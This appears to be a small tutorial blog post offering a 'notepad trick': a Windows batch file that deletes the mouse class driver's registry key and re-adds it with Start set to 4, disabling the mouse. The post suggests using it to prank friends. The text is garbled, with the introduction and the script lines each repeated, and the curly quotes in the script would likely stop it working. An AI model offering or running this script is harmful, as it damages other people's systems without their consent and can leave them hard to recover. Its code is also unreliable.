Amazing Notepad Tricks
Hello Friends,
I am back with one more interesting topic. As in my last some post i was talk about notepad tricks and tips. You can go there by just click here .
click here for Force Open CD Drive Continuously ,
Create Matrix effect using Notepad
Notepad trick and Hacks
Today i am going to tell you one more interesting things about notepad as we all know that notepad is a text editor software but we can do much more then text editing. You can disable your mouse click by using this trick. you can make fun with your friends by using this and for this you have do some simple coding.
Note:- Please don't run this file in your until you need it because it will; disable your system mouse click and you can be in trouble. Don't misuse this trick
I am back with one more interesting topic. As in my last some post i was talk about notepad tricks and tips. You can go there by just click here .
click here for Force Open CD Drive Continuously ,
Create Matrix effect using Notepad
Notepad trick and Hacks
Today i am going to tell you one more interesting things about notepad as we all know that notepad is a text editor software but we can do much more then text editing. You can disable your mouse click by using this trick. you can make fun with your friends by using this and for this you have do some simple coding.
Note:- Please don't run this file in your until you need it because it will; disable your system mouse click and you can be in trouble. Don't misuse this trick
- Open notepad
- Copy below code and paste it in your notepad file
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
- Now save this file with any name as you like but in last mention .bat as i saved this file as disablemouse.bat
- Double click on file if you want to run but i will tell you never try this in your system
I hope you will like and enjoy it.
If you like it then don't forget to like and share our posts and if you have any questions or any suggestions for us then please leave that in comment box we will try to short our that shortly.
We will be back soon with one more interesting trick of notepad and some more interesting topic for you.
Just connected with us for more posts
Thanking you.
Please like and share our post
Comments
Post a Comment